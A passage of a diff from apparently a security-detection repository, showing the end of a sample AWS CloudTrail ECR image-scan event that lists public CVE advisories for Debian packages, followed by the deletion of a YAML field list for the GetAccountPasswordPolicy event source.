- can store 16-bit data but unknowingly the developer has assigned a \"u4\" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-5709", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.17-3+deb10u1"}, {"key": "package_name", "value": "krb5"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2021-36222", "description": "ec_verify in kdc/kdc_preauth_ec.c in the Key Distribution Center (KDC) in MIT Kerberos 5 (aka krb5) before 1.18.4 and 1.19.x before 1.19.2 allows remote attackers to cause a NULL pointer dereference and daemon crash. This occurs because a return value is not properly managed in a certain situation.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-36222", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.17-3+deb10u1"}, {"key": "package_name", "value": "krb5"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2004-0971", "description": "The krb5-send-pr script in the kerberos5 (krb5) package in Trustix Secure Linux 1.5 through 2.1, and possibly other operating systems, allows local users to overwrite files via a symlink attack on temporary files.", "uri": "https://security-tracker.debian.org/tracker/CVE-2004-0971", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.17-3+deb10u1"}, {"key": "package_name", "value": "krb5"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2018-6829", "description": "cipher/elgamal.c in Libgcrypt through 1.8.2, when used to encrypt messages directly, improperly encodes plaintexts, which allows attackers to 
obtain sensitive information by reading ciphertext data (i.e., it does not have semantic security in face of a ciphertext-only attack). The Decisional Diffie-Hellman (DDH) assumption does not hold for Libgcrypt''s ElGamal implementation.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-6829", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.8.4-5+deb10u1"}, {"key": "package_name", "value": "libgcrypt20"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2018-11813", "description": "libjpeg 9c has a large loop because read_pixel in rdtarga.c mishandles EOF.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-11813", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1:1.5.2-2+deb10u1"}, {"key": "package_name", "value": "libjpeg-turbo"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2020-17541", "description": "Libjpeg-turbo all version have a stack-based buffer overflow in the \"transform\" component. 
A remote attacker can send a malformed jpeg file to the service and cause arbitrary code execution or denial of service of the target service.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-17541", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1:1.5.2-2+deb10u1"}, {"key": "package_name", "value": "libjpeg-turbo"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2017-15232", "description": "libjpeg-turbo 1.5.2 has a NULL Pointer Dereference in jdpostct.c and jquant1.c via a crafted JPEG file.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-15232", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1:1.5.2-2+deb10u1"}, {"key": "package_name", "value": "libjpeg-turbo"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2018-14048", "description": "An issue has been found in libpng 1.6.34. It is a SEGV in the function png_free_data in png.c, related to the recommended error handling for png_read_image.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-14048", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.6.36-6"}, {"key": "package_name", "value": "libpng1.6"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2019-6129", "description": "** DISPUTED ** png_create_info_struct in png.c in libpng 1.6.36 has a memory leak, as demonstrated by pngcp. 
NOTE: a third party has stated \"I don''t think it is libpng''s job to free this buffer.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-6129", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.6.36-6"}, {"key": "package_name", "value": "libpng1.6"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2018-14550", "description": "An issue has been found in third-party PNM decoding associated with libpng 1.6.35. It is a stack-based buffer overflow in the function get_token in pnm2png.c in pnm2png.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-14550", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.6.36-6"}, {"key": "package_name", "value": "libpng1.6"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2019-9893", "description": "libseccomp before 2.4.0 did not correctly generate 64-bit syscall argument comparisons using the arithmetic operators (LT, GT, LE, GE), which might able to lead to bypassing seccomp filters and potential privilege escalations.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-9893", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.3.3-4"}, {"key": "package_name", "value": "libseccomp"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "7.5"}]}, {"name": "CVE-2018-1000654", "description": "GNU Libtasn1-4.13 libtasn1-4.13 version libtasn1-4.13, libtasn1-4.12 contains a DoS, specifically CPU usage will reach 100% when running asn1Paser against the POC due to an issue in _asn1_expand_object_id(p_tree), after a long time, the program will be killed. 
This attack appears to be exploitable via parsing a crafted file.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-1000654", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "4.13-3"}, {"key": "package_name", "value": "libtasn1-6"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}, {"key": "CVSS2_SCORE", "value": "7.1"}]}, {"name": "CVE-2016-9085", "description": "Multiple integer overflows in libwebp allows attackers to have unspecified impact via unknown vectors.", "uri": "https://security-tracker.debian.org/tracker/CVE-2016-9085", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "0.6.1-2+deb10u1"}, {"key": "package_name", "value": "libwebp"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2015-9019", "description": "In libxslt 1.1.29 and earlier, the EXSLT math.random function was not initialized with a random seed during startup, which could cause usage of this function to produce predictable outputs.", "uri": "https://security-tracker.debian.org/tracker/CVE-2015-9019", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.1.32-2.2~deb10u1"}, {"key": "package_name", "value": "libxslt"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2009-4487", "description": "nginx 0.7.64 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to modify a window''s title, or possibly execute arbitrary commands or overwrite files, via an HTTP request containing an escape sequence for a terminal emulator.", "uri": "https://security-tracker.debian.org/tracker/CVE-2009-4487", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.21.1-1~buster"}, {"key": "package_name", "value": "nginx"}, {"key": "CVSS2_VECTOR", "value": 
"AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2020-15719", "description": "libldap in certain third-party OpenLDAP packages has a certificate-validation flaw when the third-party package is asserting RFC6125 support. It considers CN even when there is a non-matching subjectAltName (SAN). This is fixed in, for example, openldap-2.4.46-10.el8 in Red Hat Enterprise Linux.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-15719", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.4.47+dfsg-3+deb10u6"}, {"key": "package_name", "value": "openldap"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:H/Au:N/C:P/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "4"}]}, {"name": "CVE-2015-3276", "description": "The nss_parse_ciphers function in libraries/libldap/tls_m.c in OpenLDAP does not properly parse OpenSSL-style multi-keyword mode cipher strings, which might cause a weaker than intended cipher to be used and allow remote attackers to have unspecified impact via unknown vectors.", "uri": "https://security-tracker.debian.org/tracker/CVE-2015-3276", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.4.47+dfsg-3+deb10u6"}, {"key": "package_name", "value": "openldap"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2017-14159", "description": "slapd in
- OpenLDAP 2.4.45 and earlier creates a PID file after dropping privileges to a non-root account, which might allow local users to kill arbitrary processes by leveraging access to this non-root account for PID file modification before a root script executes a \"kill `cat /pathname`\" command, as demonstrated by openldap-initscript.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-14159", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.4.47+dfsg-3+deb10u6"}, {"key": "package_name", "value": "openldap"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "1.9"}]}, {"name": "CVE-2017-17740", "description": "contrib/slapd-modules/nops/nops.c in OpenLDAP through 2.4.45, when both the nops module and the memberof overlay are enabled, attempts to free a buffer that was allocated on the stack, which allows remote attackers to cause a denial of service (slapd crash) via a member MODDN operation.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-17740", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.4.47+dfsg-3+deb10u6"}, {"key": "package_name", "value": "openldap"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2010-0928", "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a \"fault-based attack.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2010-0928", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.1.1d-0+deb10u6"}, {"key": "package_name", "value": "openssl"}, {"key": 
"CVSS2_VECTOR", "value": "AV:L/AC:H/Au:N/C:C/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "4"}]}, {"name": "CVE-2007-6755", "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain \"skeleton key\" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", "uri": "https://security-tracker.debian.org/tracker/CVE-2007-6755", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.1.1d-0+deb10u6"}, {"key": "package_name", "value": "openssl"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "5.8"}]}, {"name": "CVE-2017-7246", "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 268) or possibly have unspecified other impact via a crafted file.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-7246", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2:8.39-12"}, {"key": "package_name", "value": "pcre3"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2019-20838", "description": "libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is disabled, and \\X or \\R has more than one fixed quantifier, a related issue to CVE-2019-20454.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-20838", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2:8.39-12"}, {"key": 
"package_name", "value": "pcre3"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2017-7245", "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 4) or possibly have unspecified other impact via a crafted file.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-7245", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2:8.39-12"}, {"key": "package_name", "value": "pcre3"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2017-16231", "description": "** DISPUTED ** In PCRE 8.41, after compiling, a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c because of a self-recursive call. NOTE: third parties dispute the relevance of this report, noting that there are options that can be used to limit the amount of stack that is used.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-16231", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2:8.39-12"}, {"key": "package_name", "value": "pcre3"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2017-11164", "description": "In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-11164", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2:8.39-12"}, {"key": "package_name", "value": "pcre3"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, {"key": "CVSS2_SCORE", "value": "7.8"}]}, {"name": "CVE-2011-4116", "description": "_is_safe in the 
File::Temp module for Perl does not properly handle symlinks.", "uri": "https://security-tracker.debian.org/tracker/CVE-2011-4116", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "5.28.1-6+deb10u1"}, {"key": "package_name", "value": "perl"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2019-19882", "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-19882", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1:4.5-1.1"}, {"key": "package_name", "value": "shadow"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, {"key": "CVSS2_SCORE", "value": "6.9"}]}, {"name": "CVE-2007-5686", "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. 
NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", "uri": "https://security-tracker.debian.org/tracker/CVE-2007-5686", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1:4.5-1.1"}, {"key": "package_name", "value": "shadow"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "4.9"}]}, {"name": "CVE-2013-4235", "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", "uri": "https://security-tracker.debian.org/tracker/CVE-2013-4235", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1:4.5-1.1"}, {"key": "package_name", "value": "shadow"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:M/Au:N/C:N/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "3.3"}]}, {"name": "CVE-2020-13529", "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. 
An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-13529", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "241-7~deb10u8"}, {"key": "package_name", "value": "systemd"}, {"key": "CVSS2_VECTOR", "value": "AV:A/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.9"}]}, {"name": "CVE-2013-4392", "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", "uri": "https://security-tracker.debian.org/tracker/CVE-2013-4392", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "241-7~deb10u8"}, {"key": "package_name", "value": "systemd"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:M/Au:N/C:P/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "3.3"}]}, {"name": "CVE-2020-13776", "description": "systemd through v245 mishandles numerical
- usernames such as ones composed of decimal digits or 0x followed by hex digits, as demonstrated by use of root privileges when privileges of the 0x0 user account were intended. NOTE: this issue exists because of an incomplete fix for CVE-2017-1000082.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-13776", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "241-7~deb10u8"}, {"key": "package_name", "value": "systemd"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}, {"key": "CVSS2_SCORE", "value": "6.2"}]}, {"name": "CVE-2019-20386", "description": "An issue was discovered in button_open in login/logind-button.c in systemd before 243. When executing the udevadm trigger command, a memory leak may occur.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-20386", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "241-7~deb10u8"}, {"key": "package_name", "value": "systemd"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2019-9923", "description": "pax_decode_header in sparse.c in GNU Tar before 1.32 had a NULL pointer dereference when parsing certain archives that have malformed extended headers.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-9923", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.30+dfsg-6"}, {"key": "package_name", "value": "tar"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2005-2541", "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.", "uri": "https://security-tracker.debian.org/tracker/CVE-2005-2541", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.30+dfsg-6"}, {"key": "package_name", "value": "tar"}, 
{"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, {"key": "CVSS2_SCORE", "value": "10"}]}, {"name": "CVE-2021-20193", "description": "A flaw was found in the src/list.c of tar 1.33 and earlier. This flaw allows an attacker who can submit a crafted input file to tar to cause uncontrolled consumption of memory. The highest threat from this vulnerability is to system availability.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-20193", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.30+dfsg-6"}, {"key": "package_name", "value": "tar"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2017-17973", "description": "** DISPUTED ** In LibTIFF 4.0.8, there is a heap-based use-after-free in the t2p_writeproc function in tiff2pdf.c. NOTE: there is a third-party report of inability to reproduce this issue.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-17973", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2020-35521", "description": "A flaw was found in libtiff. 
Due to a memory allocation failure in tif_read.c, a crafted TIFF file can lead to an abort, resulting in denial of service.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-35521", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2014-8130", "description": "The _TIFFmalloc function in tif_unix.c in LibTIFF 4.0.3 does not reject a zero size, which allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a crafted TIFF image that is mishandled by the TIFFWriteScanline function in tif_write.c, as demonstrated by tiffdither.", "uri": "https://security-tracker.debian.org/tracker/CVE-2014-8130", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2017-5563", "description": "LibTIFF version 4.0.7 is vulnerable to a heap-based buffer over-read in tif_lzw.c resulting in DoS or code execution via a crafted bmp image to tools/bmp2tiff.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-5563", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2020-35522", "description": "In LibTIFF, there is a memory malloc failure in tif_pixarlog.c. 
A crafted TIFF document can lead to an abort, resulting in a remote denial of service attack.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-35522", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2017-9117", "description": "In LibTIFF 4.0.7, the program processes BMP images without verifying that biWidth and biHeight in the bitmap-information header match the actual input, leading to a heap-based buffer over-read in bmp2tiff.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-9117", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "7.5"}]}, {"name": "CVE-2017-16232", "description": "** DISPUTED ** LibTIFF 4.0.8 has multiple memory leak vulnerabilities, which allow attackers to cause a denial of service (memory consumption), as demonstrated by tif_open.c, tif_lzw.c, and tif_aux.c. 
NOTE: Third parties were unable to reproduce the issue.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-16232", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2018-10126", "description": "LibTIFF 4.0.9 has a NULL pointer dereference in the jpeg_fdct_16x16 function in jfdctint.c.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-10126", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2021-22924", "description": "libcurl keeps previously used connections in a connection pool for subsequenttransfers to reuse, if one of them matches the setup.Due to errors in the logic, the config matching function did not take ''issuercert'' into account and it compared the involved paths *case insensitively*,which could lead to libcurl reusing wrong connections.File paths are, or can be, case sensitive on many systems but not all, and caneven vary depending on used file systems.The comparison also didn''t include the ''issuer cert'' which a transfer can setto qualify how to verify the server certificate.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-22924", "severity": "UNDEFINED", "attributes": [{"key": "package_version", "value": "7.64.0-4+deb10u2"}, {"key": "package_name", "value": "curl"}]}, {"name": "CVE-2021-38115", "description": "read_header_tga in gd_tga.c in the GD Graphics Library (aka LibGD) through 2.3.2 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted TGA file.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-38115", "severity": 
"UNDEFINED", "attributes": [{"key": "package_version", "value": "2.2.5-5.2"}, {"key": "package_name", "value": "libgd2"}]}, {"name": "CVE-2021-3618", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-3618", "severity": "UNDEFINED", "attributes": [{"key": "package_version", "value": "1.21.1-1~buster"}, {"key": "package_name", "value": "nginx"}]}], "findingSeverityCounts": {"HIGH": 2, "MEDIUM": 14, "INFORMATIONAL": 63, "LOW": 22, "UNDEFINED": 3}}}, "requestID": "23c19e2d-c48b-4265-b4eb-853e7b325780", "eventID": "6c94a9b2-36dc-43f8-a6dd-4ec839ded8af", "readOnly": true, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_GetAccountPasswordPolicy.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_GetAccountPasswordPolicy.yml
deleted file mode 100644
index f24185b2f5..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_GetAccountPasswordPolicy.yml
+++ /dev/null
@@ -1,77 +0,0 @@
-event_name: AWS CloudTrail GetAccountPasswordPolicy
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- desc
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
